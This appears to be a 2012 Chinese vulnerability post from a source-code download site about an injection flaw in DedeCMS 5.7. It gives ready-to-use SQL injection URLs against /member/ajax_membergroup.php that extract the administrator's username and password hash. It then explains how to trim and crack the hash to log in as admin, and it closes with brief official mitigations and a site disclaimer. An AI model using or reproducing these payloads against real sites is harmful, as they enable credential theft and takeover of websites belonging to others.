dedecms5.7最新注入和上传漏洞(2012.4.26)

发布时间:2012-4.26

漏洞类型:注入漏洞、上传漏洞

获取dedecms版本升级时间:“/data/admin/ver.txt”页面获取系统最后升级时间。


然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如下图说明该版本存在漏洞。

/member/ajax_membergroup.php?action=post&membergroup=@' Union select userid from %23@__admin where 1 or id=@' 查看id为1(管理员)的用户名。

/member/ajax_membergroup.php?action=post&membergroup=@' Union select pwd from %23@__admin where 1 or id=@' 查看id为1(管理员)的密码


得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5。
至此得到管理员用户名为admin和密码的md5,解密md5即可以管理员权限登录后台。

官方临时解决方法:

方案一、临时补丁
方案二、以网站管理员身份后台禁用会员功能:系统 -> 系统基本参数 -> 会员设置 -> 是否开启会员功能 改为(否)
方案三、可考虑直接重命名或删除存在漏洞的文件 /member/ajax_membergroup.php,最暴力却最有效的方式。

临时补丁:暂无

版权免责声明

① 本站VIP源码资源永久免费下载 www.wayu.cn
② 本网站资源来源于网络收集,如有侵权,请联系站长进行删除处理。
③ 分享目的仅供大家学习和交流,请不要用于商业用途,否则后果自负。
④ 如果你有源码需要出售,可以联系小编,或者点击 投稿
⑤ 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解。
⑥ 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需。
⑦ 在您的能力范围内,为了大环境的良性发展,请尽可能的选择正版资源。
⑧ 网站资源不做任何二次加密和授权后门(原版加密除外)

评论0

请先

没有账号? 忘记密码?